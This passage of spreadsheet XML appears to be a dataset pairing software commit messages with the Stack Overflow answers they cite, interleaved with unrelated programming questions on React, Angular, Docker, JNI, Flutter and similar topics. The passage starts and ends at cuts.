            state('false',style({height:'0px','padding-top':'0px'})),
            transition('*=&gt;*',animate('200ms'))
        ]
    )]
})
export class InputComponent implements ControlValueAccessor, AfterViewInit, OnChanges {
    // Input field type eg:text,password
    @Input()  type = "text"; 
    // ID attribute for the field and for attribute for the label
    @Input()  idd = ""; 
    // The field name text . used to set placeholder also if no pH (placeholder) input is given
    @Input()  text = ""; 
    // placeholder input
    @Input()  pH:string; 
    //current form control input. helpful in validating and accessing form control
    @Input() c:FormControl = new FormControl(); 
    // set true if we need not show the asterisk in red color
    @Input() optional : boolean = false;
    //@Input() v:boolean = true; // validation input. if false we will not show error message.
    // errors for the form control will be stored in this array
    errors:Array&lt;any&gt; = ['This field is required']; 
    // get reference to the input element
    @ViewChild('input')  inputRef:ElementRef; 
    constructor() {
    }
    ngOnChanges(){
    }
    //Lifecycle hook. angular.io for more info
    ngAfterViewInit(){ 
        // set placeholder default value when no input given to pH property      
        if(this.pH === undefined){
            this.pH = "Enter "+this.text; 
        }
        // RESET the custom input form control UI when the form control is RESET
        this.c.valueChanges.subscribe(
            () =&gt; {
                // check condition if the form control is RESET
                if (this.c.value == "" || this.c.value == null || this.c.value == undefined) {
                    this.innerValue = "";      
                    this.inputRef.nativeElement.value = "";                 
                }
            }
        );
    }
   //The internal data model for form control value access
    private innerValue: any = '';
    // event fired when input value is changed . later propagated up to the form control using the custom value accessor interface
    onChange(e:Event, value:any){
        //set changed value
        this.innerValue = value;
        // propagate value into form control using control value accessor interface
        this.propagateChange(this.innerValue);
        //reset errors 
        this.errors = [];
        //setting, resetting error messages into an array (to loop) and adding the validation messages to show below the field area
        for (var key in this.c.errors) {
            if (this.c.errors.hasOwnProperty(key)) {
                if(key === "required"){
                    this.errors.push("This field is required");
                }else{
                    this.errors.push(this.c.errors[key]);
                }              
            }
        }
    }
    //get accessor
    get value(): any {
        return this.innerValue;
    };
    //set accessor including call the onchange callback
    set value(v: any) {
        if (v !== this.innerValue) {
            this.innerValue = v;
        }
    }
    //propagate changes into the custom form control
    propagateChange = (_: any) =&gt; { }
    //From ControlValueAccessor interface
    writeValue(value: any) {
        this.innerValue = value;
    }
    //From ControlValueAccessor interface
    registerOnChange(fn: any) {
        this.propagateChange = fn;
    }
    //From ControlValueAccessor interface
    registerOnTouched(fn: any) {
    }
}
Below is the template HTML for the custom input component
&lt;div class="fg"&gt;
      &lt;!--Label text--&gt;
      &lt;label [attr.for]="idd"&gt;{{text}}&lt;sup *ngIf="!optional"&gt;*&lt;/sup&gt;&lt;/label&gt;
      &lt;!--Input form control element with on change event listener helpful to propagate changes --&gt;
      &lt;input type="{{type}}" #input id="{{idd}}" placeholder="{{pH}}" (blur)="onChange($event, input.value)"&gt;
      &lt;!--Loop through errors--&gt;
      &lt;div style="height:0px;" [@visibilityChanged]="!c.pristine &amp;&amp; !c.valid" class="error"&gt;
            &lt;p *ngFor="let error of errors"&gt;{{error}}&lt;/p&gt;
      &lt;/div&gt;
&lt;/div&gt;
Below is  custom input component which can be used in a fromGroup or individually
&lt;inv-input formControlName="title" [c]="newQueryForm.controls.title" [optional]="true" idd="title" placeholder="Type Title to search"
          text="Title"&gt;&lt;/inv-input&gt;
In this fashion if you implement your custom form controls you can apply your custom validator directives easily and accumulate the errors on that form control to display your errors.
One can imitate the same style to develop custom select component, radio button group, checkbox, textarea, fileupload etc in the above fashion with minor changes as per what the form control's behavior demands.</t>
  </si>
  <si>
    <t xml:space="preserve">thanks in advance for your help.  I am wondering if there is a (design) pattern that can be applied to this problem.  
I am looking to parse, process, and extract out values from text files with similar, but differing formats.
More specifically, I am building a processing engine that accepts Online Poker Hand History files from a multitude of different websites and parses out specific data fields (Hand #, DateTime, Players).  I will need the logic to parse the files to be slightly different for each format, but the processing of the extracted values will be the same.
My first thought would be to create just 1 class that accepts a "schema" for each file type and parses/processes accordingly.  I am sure there is a better solution to this.
Thanks! 
Bonus Point:
Any specific implementation hints in C#.
</t>
  </si>
  <si>
    <t>C323</t>
  </si>
  <si>
    <t>Use empty interface as empty props value
See: https://stackoverflow.com/questions/44738954/react-typescript-type-of-react-component-with-no-state-no-props</t>
  </si>
  <si>
    <t xml:space="preserve">From https://github.com/DefinitelyTyped/DefinitelyTyped/blob/15b7bac31972fbc081028937dfb1487507ca5fc9/types/react/index.d.ts#L199-L200
interface Component&lt;P = {}, S = {}&gt; extends ComponentLifecycle&lt;P, S&gt; { }
Props and state are initialised to {}, so for a component with no state nor prop we can simply do:
class Foo extends React.Component {} </t>
  </si>
  <si>
    <t>C324</t>
  </si>
  <si>
    <t>feat(component): gravatar-image
md5 issue:
http://stackoverflow.com/questions/24371893/how-to-use-md5-js-within-a-compontent</t>
  </si>
  <si>
    <t>JavaScript-MD5 does't export any AMD-Modules, if I see it right. But it defines
window.md5
. So your
app.import
will include it in
vendor.js
and you can call
window.md5
in the component.</t>
  </si>
  <si>
    <t>C325</t>
  </si>
  <si>
    <t>Working tests. Need to try implementing thumbnail-paragraph
component. Maybe Component props should be defined in a file separate
from the component itself? See
https://stackoverflow.com/a/45670960/1467284 for info on how to use
type properties as data</t>
  </si>
  <si>
    <t>You can't, interfaces are only for compile time because javascript doesn't support it.
What you can do is something like:
const Activity = {
    id: "",
    title: "",
    body: "",
    json: {}
}
type Activity = typeof Activity;
const headers: Array&lt;Object&gt; = Object.keys(Activity).map(key =&gt; {
    return { text: key, value: key }
});
(
code in playground
)</t>
  </si>
  <si>
    <t>C326</t>
  </si>
  <si>
    <t>docs: Update signature info for API TestCase.add_component
The docs now match current behavior, see:
https://stackoverflow.com/questions/61648405/</t>
  </si>
  <si>
    <t>From the documentation the signature of this method is:
function:: XML-RPC TestCase.add_component(case_id, component_id)
The docs tell you that component_id is an int, not a list.
^^^^ scratch that, the documentation is slightly wrong.
The second parameter is a string which should be the component name!</t>
  </si>
  <si>
    <t>C327</t>
  </si>
  <si>
    <t>strip leading backslash from class names in strings in the Zend\Mvc c
omponent
see http://stackoverflow.com/questions/5072352/instantiating-class-by-string-using-php-5-3-namespaces</t>
  </si>
  <si>
    <t>$class = 'Application\Log\MyClass';
$object = new $class();
The starting
\
introduces a (fully qualified) namespaced identifier, but it's not part of the class name itself.</t>
  </si>
  <si>
    <t>C328</t>
  </si>
  <si>
    <t>[base components] attempts to incl. style in storybook
- do we need to track the storybook static files??
- https://stackoverflow.com/questions/63498393/storybook-component-level-css-file-not-working</t>
  </si>
  <si>
    <t>In order to
storybook
works with
webpack
, you have to firstly create file
main.js
under the
.storybook
dir. Then add
style-loader
+
css-loader
loaders to resolve your
css
import. Keep in mind, enable
modules: true
option in
css-loader
to help you import your classes:
.storybook\main.js
const path = require('path');
module.exports = {
  webpackFinal: async config =&gt; {
    // Remove the existing css rule
    config.module.rules = config.module.rules.filter(
      f =&gt; f.test.toString() !== '/\\.css$/'
    );
    config.module.rules.push({
      test: /\.css$/,
      use: ['style-loader', {
        loader: 'css-loader',
        options: {
          modules: true, // Enable modules to help you using className
        }
      }],
      include: path.resolve(__dirname, '../src'),
    });
    return config;
  },
};</t>
  </si>
  <si>
    <t>C329</t>
  </si>
  <si>
    <t>Because at this time TypeScript's React types rejects function components that
does not return null | JSX.Element.
See microsoft/TypeScript#51328 RFC and follow related
links to known more.
Other links:
* DefinitelyTyped/DefinitelyTyped#18051
* DefinitelyTyped/DefinitelyTyped#62876
* https://stackoverflow.com/a/70895599</t>
  </si>
  <si>
    <t>In your case children is a string so you should wrap it with React.Fragment or &lt;&gt;&lt;/&gt;
but if children was element like below it won't throw an error
&lt;Container&gt;&lt;p&gt;foo&lt;/p&gt;&lt;/Container&gt;
so just add react fragment
import React from "react";
const Container = (props) =&gt; {
  const isNew = true; // make an api call...
  if (isNew) {
    return &lt;NewContainer {...props} /&gt;;
  } else {
    return &lt;OldContainer {...props} /&gt;;
  }
};
const NewContainer = ({ children }) =&gt; {
  const isSpecial = true;
  if (!children) {
    return null;
  }
  if (!isSpecial) {
    return &lt;React.Fragment&gt;{children}&lt;/React.Fragment&gt;;
        // or return &lt;&gt;{children}&lt;/&gt;;
  }
  return &lt;a&gt;{children}&lt;/a&gt;;
};
const OldContainer = ({ children }) =&gt; {
  const isSpecial = useIsSpecial();
  if (!children) {
    return null;
  }
  if (!isSpecial) {
    return &lt;React.Fragment&gt;{children}&lt;/React.Fragment&gt;;
    // or return &lt;&gt;{children}&lt;/&gt;;
  }
  return &lt;a&gt;{children}&lt;/a&gt;;
};
const Main = () =&gt; (
  &lt;Container&gt;
    &lt;a&gt;foo&lt;/a&gt;
  &lt;/Container&gt;
);
export default Main;</t>
  </si>
  <si>
    <t>C33</t>
  </si>
  <si>
    <t>Implement displaying huge article body
If i had rendered the article body as a whole, it takes a while to load the body
To fix this, we splited the huge text body into multiple smaller chunks, place a Flatlist and pass the array of paragraphs to it.
FYI:
Fir our article that has web links in them, i made the text highlightable so that the user can copy the url. Another option will be to check if the text includes a url then you will render a different component other than Text
- https://stackoverflow.com/questions/34933860/react-native-how-to-detect-link-form-string-and-convert-to-a-link</t>
  </si>
  <si>
    <t>You can use react-native-hyperlink:
import Hyperlink from 'react-native-hyperlink'
import {Text, Linking} from 'react-native'
const MyComponent = () =&gt; (
  &lt;Hyperlink onPress={Linking.openURL}&gt;
    &lt;Text&gt;{"Click on https://stackoverflow.com to test"}&lt;/Text&gt;
  &lt;/Hyperlink&gt;
)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The problem is that those elements that are next to the app bar do not work when pressed on iOS devices with Dynamic Island, for example, on the iPhone 14 everything works, but on the 14 Pro it does not, is there any way to remove the restrictions?&lt;/p&gt;
&lt;p&gt;I tried Gesture Detector and Ink Well, but they do not work, I also tried Save Aria, but it lowers the element too low, does anyone know a working method?&lt;/p&gt;
&lt;p&gt;An example of the code is below, my widget TopWidget does not work when pressed until I specify the padding down at least 64&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;return Scaffold(
        backgroundColor: theme.scaffoldBackgroundColor,
        body: Column(
          crossAxisAlignment: CrossAxisAlignment.start,
          children: [
            const _TopWidget(),
            Expanded(
              child: PageView.builder(
                itemCount: 7,
                itemBuilder: (context, index) {
                  final dayName = daysOfWeek[index];
                  return Column(
                    children: [
                      _RuleCard(
                        ruleType: rule.type ?? &amp;quot;command&amp;quot;,
                        ruleId: ruleId,
                        dayName: daysOfWeek[index],
                        data: data,
                        isOneDayMode: false,
                      ),
                      const Spacer(),
                      _BottomWidget(
                          data: data,
                          ruleId: ruleId,
                          dayName: dayName,
                          rule: rule),
                    ],
                  );
                },
              ),
            ),
          ],
        ),
      );
  class _TopWidget extends StatelessWidget {
  const _TopWidget();
  @override
  Widget build(BuildContext context) {
return Padding(
  padding: const EdgeInsets.symmetric(horizontal: 16, vertical: 8),
  child: GestureDetector(
      onTap: () {
        Navigator.pop(context);
      },
      child: Row(
        children: [
          const Icon(
            Icons.chevron_left,
            color: Colors.blue,
            size: 30,
          ),
          Text(
            S.of(context).back,
            style: const TextStyle(fontSize: 17, color: 
  Colors.blue),
          ),
        ],
      )),
 );
 }
 }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C330</t>
  </si>
  <si>
    <t>stateless comopnent in route
ref: http://stackoverflow.com/questions/27864720/react-router-pass-props-to-handler-component</t>
  </si>
  <si>
    <t>UPDATE
Since new release, it's possible to pass props directly via the
Route
component, without using a Wrapper. For example, by
using
render
prop
.
Component:
class Greeting extends React.Component {
  render() {
    const {text, match: {params}} = this.props;
    const {name} = params;
    return (
      &lt;React.Fragment&gt;
        &lt;h1&gt;Greeting page&lt;/h1&gt;
        &lt;p&gt;
          {text} {name}
        &lt;/p&gt;
      &lt;/React.Fragment&gt;
    );
  }
}
Usage:
&lt;Route path="/greeting/:name" render={(props) =&gt; &lt;Greeting text="Hello, " {...props} /&gt;} /&gt;
Codesandbox Example
OLD VERSION
My preferred way is wrap the
Comments
component and pass the wrapper as a route handler.
This is your example with changes applied:
var Dashboard = require('./Dashboard');
var Comments = require('./Comments');
var CommentsWrapper = React.createClass({
  render: function () {
    return (
      &lt;Comments myprop="myvalue"/&gt;
    );
  }
});
var Index = React.createClass({
  render: function () {
    return (
      &lt;div&gt;
        &lt;header&gt;Some header&lt;/header&gt;
        &lt;RouteHandler/&gt;
      &lt;/div&gt;
    );
  }
});
var routes = (
  &lt;Route path="/" handler={Index}&gt;
    &lt;Route path="comments" handler={CommentsWrapper}/&gt;
    &lt;DefaultRoute handler={Dashboard}/&gt;
  &lt;/Route&gt;
);
ReactRouter.run(routes, function (Handler) {
  React.render(&lt;Handler/&gt;, document.body);
});</t>
  </si>
  <si>
    <t>C331</t>
  </si>
  <si>
    <t>Add bits to hide safara user interface
http://stackoverflow.com/questions/273671/hiding-safari-user-interface-components-on-iphone</t>
  </si>
  <si>
    <t>window.top.scrollTo(0, 1);
Works on iPhone, but not in iPad.  I have been successful hiding the browser components on iPad (so presumably everywhere) by using
&lt;meta name="apple-mobile-web-app-capable" content="yes" /&gt;
and launching from a home-screen link.  I am also using
&lt;meta name="viewport" 
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /&gt;
I have not tried seeing if the browser components are still hidden if I leave out the viewport properties.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created a minimalistic test to see if commandScript still passes the arguments to the bean but it does not seem to do so anymore. Am I reading them from the wrong place?&lt;/p&gt;
&lt;p&gt;When I press the button in the example I created the backend is called but the requestParameterMap does not contain my submitted value.&lt;/p&gt;
&lt;p&gt;The button calls the javascript function and that function calls the commandScript. Somhow I thought this was more clear :)&lt;/p&gt;
&lt;p&gt;See &lt;a href="https://github.com/MilovdZee/myfaces-minimal-test" rel="nofollow noreferrer"&gt;https://github.com/MilovdZee/myfaces-minimal-test&lt;/a&gt; for the example. And down here the relevant snippets.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Log4j2
@Named
@SessionScoped
public class CommandScriptBean implements Serializable {
    public String getButtonName() {
        log.info(&amp;quot;getButtonName&amp;quot;);
        return &amp;quot;button&amp;quot;;
    }
    public void commandScript() {
        log.info(&amp;quot;CommandScriptBean&amp;quot;);
        FacesContext fc = FacesContext.getCurrentInstance();
        ExternalContext ec = fc.getExternalContext();
        Map&amp;lt;String, String&amp;gt; requestParameterMap = ec.getRequestParameterMap();
        log.info(&amp;quot;Passed value: 'test'='{}'&amp;quot;, requestParameterMap.get(&amp;quot;test&amp;quot;));
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html xmlns=&amp;quot;http://www.w3.org/1999/xhtml&amp;quot;
      xmlns:h=&amp;quot;jakarta.faces.html&amp;quot;
&amp;gt;
&amp;lt;h:head&amp;gt;
    &amp;lt;title&amp;gt;Minimal test&amp;lt;/title&amp;gt;
&amp;lt;/h:head&amp;gt;
&amp;lt;h:body&amp;gt;
    &amp;lt;h:form id=&amp;quot;form1&amp;quot;&amp;gt;
        &amp;lt;h:commandScript id=&amp;quot;jsFunction&amp;quot;
                         name=&amp;quot;jsFunction&amp;quot;
                         actionListener=&amp;quot;#{commandScriptBean.commandScript}&amp;quot;
        /&amp;gt;
        &amp;lt;script&amp;gt;
            function testFunction() {
                console.log(&amp;quot;testFunction&amp;quot;);
                jsFunction({&amp;quot;test&amp;quot;: &amp;quot;value&amp;quot;});
            }
        &amp;lt;/script&amp;gt;
        This is a form&amp;lt;br/&amp;gt;
        &amp;lt;h:commandButton id=&amp;quot;button&amp;quot; onclick=&amp;quot;testFunction(); return false;&amp;quot; value=&amp;quot;#{commandScriptBean.buttonName}&amp;quot;/&amp;gt;
    &amp;lt;/h:form&amp;gt;
&amp;lt;/h:body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C332</t>
  </si>
  <si>
    <t xml:space="preserve"> Service Worker app updates
Use UpdateService to check for updates in app component
update in main.ts
https://stackoverflow.com/questions/50968902/angular-service-worker-swupdate-available-not-triggered
HtmlDocument deprecated =&gt; Document</t>
  </si>
  <si>
    <t>You will probably need to tell the service worker to check the server for updates, I usually use a service for this:
export class UpdateService {
  constructor(public updates: SwUpdate) {
    if (updates.isEnabled) {
      interval(6 * 60 * 60).subscribe(() =&gt; updates.checkForUpdate()
        .then(() =&gt; console.log('checking for updates')));
    }
  }
  public checkForUpdates(): void {
    this.updates.available.subscribe(event =&gt; this.promptUser());
  }
  private promptUser(): void {
    console.log('updating to new version');
    this.updates.activateUpdate().then(() =&gt; document.location.reload()); 
  }
In your
app-component.ts
:
constructor(private sw: UpdateService) {
    // check the service worker for updates
    this.sw.checkForUpdates();
  }
For whatever reason, Angular sometimes does not register the service worker properly. So you can modify  `main.ts` :
Replace:
platformBrowserDynamic().bootstrapModule(AppModule);
With:
platformBrowserDynamic().bootstrapModule(AppModule).then(() =&gt; {
  if ('serviceWorker' in navigator &amp;&amp; environment.production) {
    navigator.serviceWorker.register('ngsw-worker.js');
  }
}).catch(err =&gt; console.log(err));</t>
  </si>
  <si>
    <t>C333</t>
  </si>
  <si>
    <t>Shadow elm-stuff build artifacts from local machine.
When build artifacts from local machine are reused in container, it
usually ends with "corrupt binary" error.
.dockerignore does not work for volumes so we define additional volume
to cover one path on existing mount:
https://stackoverflow.com/questions/29181032/add-a-volume-to-docker-but-exclude-a-sub-folder</t>
  </si>
  <si>
    <t>Using docker-compose I'm able to use node_modules locally, but ignore it in the docker container using the following syntax in the
docker-compose.yml
volumes:
   - './angularApp:/opt/app'
   - /opt/app/node_modules/
So everything in
./angularApp
is mapped to
/opt/app
and then I create another mount volume
/opt/app/node_modules/
which is now empty directory - even if in my local machine
./angularApp/node_modules
is not empty.</t>
  </si>
  <si>
    <t>C334</t>
  </si>
  <si>
    <t>[client] updated the Explore component to include responsiveness
- using a wrapper to avoid issues with responsiveness on the explore page below 500px because of the ReactPaginate component
- relevant link: https://stackoverflow.com/a/22325875</t>
  </si>
  <si>
    <t>I have modified Bootstrap to not include the responsive features for devices under 1000px.
This example should demonstrate this:
http://floating-wildwood-8562.herokuapp.com/examples/grid.html
You can use this modified responsive bootstrap css file
here
.
This required two changes to Bootstrap's LESS files and a rebuild of the framework.
Shown here
and
here
You may also decide to add this to your css:
html, body {
  min-width: 1000px;
}
This way the window will be forced to be at least 1000px.</t>
  </si>
  <si>
    <t>C335</t>
  </si>
  <si>
    <t>JNI bugfix: globalizing jclass lookup (needed for caching)
http://stackoverflow.com/questions/2093112/why-i-should-not-reuse-a-jclass-and-or-jmethodid-in-jni</t>
  </si>
  <si>
    <t>The rules here are clear. Method ID and field ID values are forever. You can hang onto them. The lookups take some time.
jclass
, on the other hand, is generally a
local reference
. A local reference survives, at most, the duration of a single call to a JNI function.
If you need to optimize, you have to ask the JVM to make a global reference for you. It's not uncommon to acquire and keep references to common classes like
java.lang.String
.
Holding such a reference to a class will prevent it (the class) from being garbage-collected, of course.
jclass local = env-&gt;FindClass(CLS_JAVA_LANG_STRING);
_CHECK_JAVA_EXCEPTION(env);
java_lang_string_class = (jclass)env-&gt;NewGlobalRef(local);
_CHECK_JAVA_EXCEPTION(env);
env-&gt;DeleteLocalRef(local);
_CHECK_JAVA_EXCEPTION(env);
The check macro calls:
static inline void
check_java_exception(JNIEnv *env, int line)
{
    UNUSED(line);
    if(env-&gt;ExceptionOccurred()) {
#ifdef DEBUG
        fprintf(stderr, "Java exception at rlpjni.cpp line %d\n", line);
        env-&gt;ExceptionDescribe();
    abort();
#endif
        throw bt_rlpjni_java_is_upset();
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I create a documentation site for my Swift project using &lt;code&gt;swift-docc-plugin&lt;/code&gt;, it creates a structure such as this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- docs
    - index.html
    - css
    - data
    - js
    - images
    - documentation
        - [target-name]
            - index.html
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The HTML root should be set to this &lt;code&gt;docs&lt;/code&gt; folder, and the result is that the documentation lives on the URL &lt;a href="https://example.com/documentation/%5Btarget-name%5D/" rel="nofollow noreferrer"&gt;https://example.com/documentation/[target-name]/&lt;/a&gt; instead of just &lt;a href="https://example.com/" rel="nofollow noreferrer"&gt;https://example.com/&lt;/a&gt;, which is what I want. Or in the case of my actual package where I host the docs using GitHub pages: the documentation URL is &lt;a href="https://loopwerk.github.io/Saga/documentation/saga/" rel="nofollow noreferrer"&gt;https://loopwerk.github.io/Saga/documentation/saga/&lt;/a&gt; instead of just &lt;a href="https://loopwerk.github.io/Saga/" rel="nofollow noreferrer"&gt;https://loopwerk.github.io/Saga/&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Making this worse is that when you go to &lt;a href="https://loopwerk.github.io/Saga/" rel="nofollow noreferrer"&gt;https://loopwerk.github.io/Saga/&lt;/a&gt; you get a 404 error because DocC doesn't create a proper root page. Same goes for &lt;a href="https://loopwerk.github.io/Saga/documentation/" rel="nofollow noreferrer"&gt;https://loopwerk.github.io/Saga/documentation/&lt;/a&gt;. This is incredibly annoying to me.&lt;/p&gt;
&lt;p&gt;Is it possible to take the &lt;code&gt;docs/documentation/saga&lt;/code&gt; folder and make that the site root? The problem is that it references css, javascript, images, json data, and other resources from higher up, and those would no longer be accessible this way.&lt;/p&gt;
&lt;p&gt;Have people come up with solutions to make prettier URLs for the generated docs? I am willing to switch from GitHub pages to a custom (sub)domain where I have full control over the webserver, Nginx in my case. So if I could host the docs on &lt;a href="https://saga.loopwerk.io/" rel="nofollow noreferrer"&gt;https://saga.loopwerk.io/&lt;/a&gt; or &lt;a href="https://saga.loopwerk.io/documentation/" rel="nofollow noreferrer"&gt;https://saga.loopwerk.io/documentation/&lt;/a&gt; that would be great.&lt;/p&gt;
&lt;p&gt;Basically what I am looking for is that &lt;code&gt;docs/documentation/[target-name]/*&lt;/code&gt; gets moved to &lt;code&gt;docs/&lt;/code&gt; and it just keeps working.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C336</t>
  </si>
  <si>
    <t>fix: escape everything with modified QueryEscape
This commit switches to using `QueryEscape` for escaping all components.
However, because `QueryEscape` escapes ` ` (space) to `+`, we actually
change that to a `%20`, that is the percent-encoded equivalent.
`QueryEscape` was built for HTTP Query parameters, and although there is
[some discussion](https://stackoverflow.com/questions/2678551/when-should-space-be-encoded-to-plus-or-20)
around it, escaping ` ` to a `+` is completely valid.
Sadly, other languages like Javascript don't handle that properly, so if
we simply used `QueryEscape`, the purl couldn't be parsed by other
implementations.
By using the universally supported `%20` instead, we restore
compatibility.</t>
  </si>
  <si>
    <t>means a space only in application/x-www-form-urlencoded content, such as the query part of a URL:
http://www.example.com/path/foo+bar/path?query+name=query+value
In this URL, the parameter name is query name with a space and the value is query value with a space, but the folder name in the path is literally foo+bar, not foo bar.
%20 is a valid way to encode a space in either of these contexts. So if you need to URL-encode a string for inclusion in part of a URL, it is always safe to replace spaces with %20 and pluses with %2B. This is what, e.g., encodeURIComponent() does in JavaScript. Unfortunately it's not what urlencode does in PHP (rawurlencode is safer).
See Also
HTML 4.01 Specification application/x-www-form-urlencoded</t>
  </si>
  <si>
    <t xml:space="preserve">I'm thinking of choosing Adobe AIR as the client-side implementation technology for an upcoming project. (The previous choice was C# and WPF, but I've been really impressed with Flash/Flex/AIR lately.)
But one of the most important features of my product will be its plugin architecture, allowing third party developers to extend the functionality and GUI in interesting ways.
I know how I'd design the architecture in C#: A plug-in loader would enumerate all of the assemblies in the local "app/plugins/" directory. For each assembly, it'd enumerate all of the classes, looking for implementations of the "IPluginFactory" interface. For each plugin created by the factory, I'd ask it for its MVC classes, and snap its GUI elements (menu items, panels, etc) into the appropriate slots in the existing GUI layout.
I'd like to accomplish the same thing within AIR (loading plugins from the local filesystem, not from the web). After reading [external-link], my understanding is that it's possible, and that the basic architecture (loading SWFs into sandboxed ApplicationDomains, etc) is very similar to the way you'd do it in .NET.
But I'm curious about the gotchas.
If any of you have done any dynamic classloading with the flash player (preferably in mixed flash/flex apps, and ESPECIALLY within the AIR host), I'd love to hear about your experiences building your plugin framework and where you ran into tricky situations with the flash player, and with the flash, flex, and AIR APIs.
For example, if someone asked me this same question, but with the Java platform in mind, I'd definitely mention that the JVM has no notion of "modules" or "assemblies". The highest level of aggregation is the "class", so it can be difficult to create organizational structures within a plugin system for managing large projects. I'd also talk about issues with multiple classloaders and how each maintains its own separate instance of a loaded class (with its own separate static vars).
Here are a few specific questions still unanswered for me:
1) The actionscript "Loader" class can load an SWF into an ApplicationDomain. But what exactly does that appdomain contain? Modules? Classes? How are MXML components represented? How do I find all of the classes that implement my plugin interface?
2) If you've loaded a plugin into a separate ApplicationDomain from the main application, is it substantially more complicated to call code from within that other appdomain? Are there any important limitations about the kinds of data that can pass through the inter-appdomain marshalling layer? Is marshalling prohibitively expensive?
3) Ideally, I'd like to develop the majority of my own main code as a plugin (with the main application being little more than a plugin-loading shell) and use the plugin architecture to hoist that functionality into the app. Does that strike fear in your heart?
</t>
  </si>
  <si>
    <t>C337</t>
  </si>
  <si>
    <t>Use compgen -G instead of ls for finding enabled components
Reference: https://stackoverflow.com/a/34195247/1228454</t>
  </si>
  <si>
    <t>Bash-specific solution:
compgen -G "&lt;glob-pattern&gt;"
Escape the pattern or it'll get pre-expanded into matches.
Exit status is:
1 for no-match,
0 for 'one or more matches'
stdout is a list of files matching the glob. I think this is the best option in terms of conciseness and minimizing potential side effects.
Example:
if compgen -G "/tmp/someFiles*" &gt; /dev/null; then
    echo "Some files exist."
fi</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with an FDTD problema and to get a better performance I'm programming in CUDA. What am I doing wrong?&lt;/p&gt;
&lt;p&gt;This my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  using BenchmarkTools
  using CUDA
  CUDA.@allowscalar(true)
  tamaÃ±o::Int32 = 200 
  epsilon = CuArray{Float32}(undef,tamaÃ±o)
  function Cond_Front()
      CUDA.@sync CUDA.@allowscalar  for mm in 1:1:tamaÃ±o
          if (mm &amp;lt;= 100)
              @inbounds epsilon[mm] = 1.0
          else
              @inbounds epsilon[mm] = 9.0
          end
      end
      return #nothing
  end
  function bench_gpu1!()
     CUDA.@sync begin
          @cuda Cond_Front()
      end
  end
  # MEDICION DEL TIEMPO DE EJECUCION
  @btime bench_gpu1!()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;This is the error I get :&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;IDs have conflicting values ('i32 4' from globals with 'i32 2' from start)&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>C338</t>
  </si>
  <si>
    <t>fix(App): cancel setState on unmounted component
https://stackoverflow.com/questions/48623313/reactdom-unmountcomponentatnode-in-test-causes-warning\?rq\=1</t>
  </si>
  <si>
    <t>The easiest way to resolve this issue is to make your
fetch()
properly cancel itself when the component is unmounted. Having async requests in a
componentDidMount()
that don't cancel themselves
is bad practice in React, because depending on network speed and UI interactions, they can frequently attempt to update the state of an unmounted component. Either use a cancelable
Promise
, or use a
this.shouldCancel
instance variable to indicate weather to call
setState()
or not, like so:
class LifecycleTest extends React.Component {
  constructor(props){
    super(props)
    this.shouldCancel = false;
    this.state = {
      result:null,
      err:null
    }
  }
  componentDidMount(){
    asyncTask()
      .then(result =&gt; !this.shouldCancel ? this.setState({result}) : null)
      .catch(err =&gt; !this.shouldCancel ? this.setState({err}) : null);
  }
  componentWillUnmount(){
    this.shouldCancel = true
  }
  render(){
    const {err, result} = this.state
    if(err){
      return &lt;div className="err"&gt;{err}&lt;/div&gt;
    }else if (result){
      return &lt;div className="result"&gt;{result}&lt;/div&gt;
    }else{
      return &lt;div className="loading"&gt;Loading...&lt;/div&gt;
    }        
  }
}
(
view on webpackbin
)
That said, if you really want to make this test pass without changing the source, you could mock
fetch()
to return a 'dud'
Promise
that never resolves. For instance, adding this should fix the error:
window.fetch = jest.fn(() =&gt; new Promise((accept, reject) =&gt; {}))
However, this is a dreadful hack. The better solution is just to properly cancel network requests on component unmount.</t>
  </si>
  <si>
    <t xml:space="preserve">The same way DOS morphed into Windows?
We seem to have ended up supporting and developing for three platforms from Microsoft, and I'm not sure where the boundaries are supposed to lie.
Why can't the benefits of the CLR (such as type safety, memory protection, etc.) be built into Windows itself?
Or into the browser? Why an entirely other virtual machine? (How may levels of virtual machine indirection are we dealing with now? We just added Silverlight - and before that Flash - running inside the Browser running inside maybe a VM install...)
I can see raw Windows for servers, but why couldn't there be a CLR for workstations talking directly to the hardware (or at least not the whole Windows legacy ball and chain)?
(ooppp - I've got two questions here. Let's make this - why can't .net be built into Windows? I understand about backward compatibility - but the safety of what's in .NET could be at least optionally in Windows itself, couldn't it? It would just be yet another of many sets of APIs?)
Factoid - I recall that one of the competitor architectures selling against MS-DOS on the IBM PC was UCSD-pascal runtime - a VM.
</t>
  </si>
  <si>
    <t>C339</t>
  </si>
  <si>
    <t>Fixed issue with the render error
The issue was caused due to the hook being processed after the
components are utilized.
ref :
https://stackoverflow.com/questions/59339287/rendered-more-hooks-than-during-the-previous-render-error-when-the-initial-val</t>
  </si>
  <si>
    <t>The problem is that you are using hook below return. Try to update
export default NotificationScreen = ({ navigation }) =&gt; {
    const { data: initialNotificationSettings, loading: loadingInitialSettings, error: initialSettingsError } = useQuery(GET_NOTIFICATION_SETTINGS)
    const [borrowerPending, notifyBorrowerPending] = useState("")
    useEffect(() =&gt; {
        if (initialNotificationSettings.me) {
            const { borrowerLendingNotificationToken } = initialNotificationSettings.me
